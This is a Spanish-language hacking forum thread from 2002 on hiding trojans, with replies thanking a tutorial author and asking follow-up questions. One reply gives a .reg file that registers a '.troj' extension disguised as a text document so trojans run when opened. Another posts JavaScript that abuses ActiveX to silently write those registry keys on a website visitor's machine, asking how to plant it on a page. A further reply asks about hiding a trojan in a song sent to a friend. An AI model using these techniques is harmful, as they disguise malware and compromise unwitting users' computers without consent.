Ocultación de troyanos

Iniciado por el-brujo, 28 Agosto 2002, 15:54 PM

0 Miembros y 1 Visitante están viendo este tema.

Croserdog

Muchas gracias por el curso :)

Salu2!

ginerdavid


Run919

Hoye yo en el regedit no tengo la extension *.troj k e de hacer si no la tengo la creo yo mismo ¿?

icisneros

Una pequeña duda, como creo la extension .troj para que actue como un ejecutable?? esa primera parte no la entiendo ayuda por favor!!!

Creature

#14
1° Abres un notepat
2° Colocas por ej:
REGEDIT4
[HKEY_CLASSES_ROOT\.troj]
@="trojfile"
[HKEY_CLASSES_ROOT\trojfile]
@="Documento de texto"
"NeverShowExt"=""
[HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]
@=""%1" %*"

3° Guardas el archivo como *.reg
4° Le das doble click y te sale '¿Desea adjuntar al registro?' (algo asi) y le pones aceptar o también puedes darle click derecho y luego 'Combinar'
Toma mi mano sigueme, te mostrare lo que tu alma no ve!
por equipaje solo lleva tu fé, por escudero el valor sieempree teen!

kinky

gracias por el super artículo y las explicaciones, es de lo mejor que he visto en ocultacion de troyanos, si encuentro algo mas no dudare en publicarlo..saludos!!
Ing. Desarrollo de Software

RaDioX - Noxz

pues ponle que meta un troyano en una cancion...y le mande ese archivo a un amigo con antivirus..el bicho ese se pilla que aunk escondido es un troyano?

Where Hackers Must Live... I OWN.
        "KNOWLEDGE IS POWER"
"KNOWLEDGE SHARED IS POWER LOSS!"

El amor es algo placentero que te hace cruzar caminos dolorosos

Que Nos Gobiernen, Juzguen y Cuiden Las Putas Ya Que Sus Hijos Nos Han Fallado!!!!!!

Creature

¿ ??? ?

Explicate mejor .::IsHaM::.
Toma mi mano sigueme, te mostrare lo que tu alma no ve!
por equipaje solo lleva tu fé, por escudero el valor sieempree teen!

SnAkE

Bueno, toda esa explicacion es bastante buena,
pero tengo una duda, la mejor manera para crearle la extension .troj a un win98 seria a traves del javascript, pero claro me podriais explicar como puedo meter este javascritp en mi web, para q al entrar le salga el error de secuencia en su pc.
Todavia sigue valiendo este javascript:

#script#
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets
;
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

#/script#

(sustituye los simbolos "#script#" y "#/script#" por "<script>" y "</script>" para que funcione ).


Muchas gracias.

ricky_corral

muy buen ensayo sobre ocultacion de troyanos me parecio excelente y perfecto gracias
una pregunta, de donde sacaste toda esa informacion?
sobres bye 8)
viva mexico